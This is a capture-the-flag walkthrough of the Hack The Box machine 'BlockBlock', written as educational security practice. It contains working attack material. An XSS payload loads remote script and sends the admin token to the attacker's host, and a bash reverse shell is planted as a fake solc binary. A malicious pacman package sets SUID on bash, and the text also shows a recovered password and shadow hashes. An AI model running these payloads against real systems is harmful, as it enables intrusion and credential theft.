HTB-BlockBlock

eugewx2025-04-012025-08-09

Box Info

Difficulty	Hard
OS	Linux
IP Address	10.10.11.43

Port Scanning

# Check all open TCP
sudo rustscan 10.10.11.43 -r 1-65535 --ulimit 5000
# Nmap scan with script on open TCP port
sudo nmap 10.10.11.43 -sCV -Pn -sT -p 22,80,8545
# Nmap scan vulnerability 
sudo nmap -sT -p 22,80,8545 --script=vuln -O -Pn 10.10.11.43
# Nmap scan with UDP port
sudo nmap -sU --top-ports 20 -Pn 10.10.11.43

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.7 (protocol 2.0)
| ssh-hostkey: 
|   256 d6:31:91:f6:8b:95:11:2a:73:7f:ed:ae:a5:c1:45:73 (ECDSA)
|_  256 f2:ad:6e:f1:e3:89:38:98:75:31:49:7a:93:60:07:92 (ED25519)
80/tcp   open  http    Werkzeug httpd 3.0.3 (Python 3.12.3)
|_http-title:          Home  - DBLC    
|_http-server-header: Werkzeug/3.0.3 Python/3.12.3
8545/tcp open  http    Werkzeug httpd 3.0.3 (Python 3.12.3)
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
|_http-server-header: Werkzeug/3.0.3 Python/3.12.3

Update DNS

1 2	sudo nano /etc/hosts 10.10.11.43 blockblock.htb

Service Enumeration

80/tcp - HTTP

At the bottom is showed You can review our smart contracts anytime http[:]//10[.]10[.]11[.]43/api/contract_source.

Upon checking the link it shows

We can use the save option and read it with jq option

Then export it to two different file.

1 2	cat contract_source.json \| jq -r '."Chat.sol"' > Chat.sol cat contract_source.json \| jq -r '."Database.sol"' > Database.sol

XSS Vulnerable

Upon checking the HTML code after login, found the javascript there is a username input without any sanitization, means it is vulnerable to xss.

Go in depth to the script code, we can see that the escapeHtml function replaced few important xss pattern. Based on the above code, we can check if we add the username query at the back of the url ?username=cxk

It will result in 401 Unauthorized that could be possible of administration task will check the ?username=cxk and there is an option to report user in the Chat page/h

XSS Payload

Trying reach out to KALI host

1	<img src="http://10.10.xx.xx:8088"/>

Where it shows xss successful, means behind the user report function there is a bot to examinate the username.

Upon checking the bot, it is using browser to access. Here we will create the Javascript payload

payload.js

fetch('/api/info').then(response => response.text()).then(text => {
    fetch('http://10.10.xx.xx/log?' + btoa(text), {
        mode: 'no-cors'
    });
});

Setup http listener

1	python3 -m http.server 80

XSS exploit

1	<img src=1 onerror="this.remove(); var cxk = document.createElement('script'); cxk.src='http://10.10.xx.xx/payload.js'; document.body.appendChild(cxk);">

Here it return a base64 use cyberchef to decode it

eyJyb2xlIjoiYWRtaW4iLCJ0b2tlbiI6ImV5SmhiR2NpT2lKSVV6STFOaUlzSW5SNWNDSTZJa3BYVkNKOS5leUptY21WemFDSTZabUZzYzJVc0ltbGhkQ0k2TVRjME16SXpOVGM1TVN3aWFuUnBJam9pTnpVNVpqSTJNVEF0TldZeU1pMDBNV000TFRrMlltSXRNMk15WkRjNU1tVm1NRE15SWl3aWRIbHdaU0k2SW1GalkyVnpjeUlzSW5OMVlpSTZJbUZrYldsdUlpd2libUptSWpveE56UXpNak0xTnpreExDSmxlSEFpT2pFM05ETTROREExT1RGOS4wMng3cHJSMkxNbWwtZVdsSDRTc0U2azVrZ1poLU9xNkJCMlpFNXdoM0tzIiwidXNlcm5hbWUiOiJhZG1pbiJ9Cg==

{"role":"admin","token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTc0MzIzNTc5MSwianRpIjoiNzU5ZjI2MTAtNWYyMi00MWM4LTk2YmItM2MyZDc5MmVmMDMyIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6ImFkbWluIiwibmJmIjoxNzQzMjM1NzkxLCJleHAiOjE3NDM4NDA1OTF9.02x7prR2LMml-eWlH4SsE6k5kgZh-Oq6BB2ZE5wh3Ks","username":"admin"}

With the admin token, lets replace it to our browser session and check what can we explore from the web.

Now there is a new Admin module allow us to explore.

In the users page found a new user **kiera**During accessing to /admin page, found it was doing the POST to /api/json-rpc

JSON-RPC API

Upon OSINT, Ethereum blockchain implements a JSON-RPC, there is a uniform set of methods that applications can rely on regardless of the specific node or client implement.

eth_getBalance is to return the balance of the account of given address

Upon testing, I found the eth_getBlockByNumber function would be useful in this situation. As it can obtain every block content.

Lets start with the 0x1 block

From the code hash looks like hex. Lets use cyberchef to decode it.

Upon checking we found the kiera credentials

1	keira : SomedayBitCoinWillCollapse

Initiate User Foothold

Access to Keira

Validate the ssh access

1	nxc ssh blockblock.htb -u keira -p SomedayBitCoinWillCollapse

1	ssh keira@blockblock.htb

User Flag

Privilege Escalation

sudo privilege

Seems like keira can run sudo as paul user to execute the forge without password. Lets check what is the forge

1	sudo -u paul /home/paul/.foundry/bin/forge

Foundry Book

From the document we can understand the when doing the forge build, we can define the --use <SOLC_VERSION> command and specify the SOLC path

1	sudo -u paul /home/paul/.foundry/bin/forge build -h

Keira to Paul

To abuse forge build we can create a new project and in the later phase we will abuse it

sudo -u paul /home/paul/.foundry/bin/forge init /dev/shm/exploit --no-git --offline
# Create reverse shell 
echo -e '#!/bin/bash\nbash -i >& /dev/tcp/10.10.xx.xx/9001 0>&1' > /dev/shm/solc
cd /dev/shm/exploit
chmod +x ../solc

Exploit

# On KALI Start the listener
rlwrap nc -lvnp 9001

# Back to the victim server and execute
sudo -u paul /home/paul/.foundry/bin/forge build --use ../solc

Sudo privilege

Here shows the paul user doesn’t require password to execute pacman

Initiate Root Foothold

Exploiting pacman to Get Root Access

Create malicious package

cd /dev/shm
echo -e "pkgname=exp\npkgver=1.0\npkgrel=1\narch=('any')\ninstall=exp.install" > PKGBUILD
echo "post_install() { chmod 4777 /bin/bash; }" > exp.install
makepkg -s

Abuse pacman to execute the malicious package

1	sudo /usr/bin/pacman -U exp-1.0-1-any.pkg.tar.zst

Execute the bash

bash -p

Root flag

Shadow

1
2
3

root:$y$j9T$aS1WjBeHOMsj5JDGpOSTR0$eEn9e2kIqFfcRCf79xQw7iLDJbt/ioE793tqS3GnjsC:19878::::::
keira:$y$j9T$XXkQ9ogGKlThyrI.mItx80$eMiwlviC0FB/bu5tWtoc.DpedzwUnOwETzmlPf6ZuC8:19878:0:99999:7:::
paul:$y$j9T$milm8la5tGGIhUazNYV3k.$lsAle1Ny3lNaIzStej/8qsKj/1wSgaoi15f/u5Ky/h9:19878:0:99999:7:::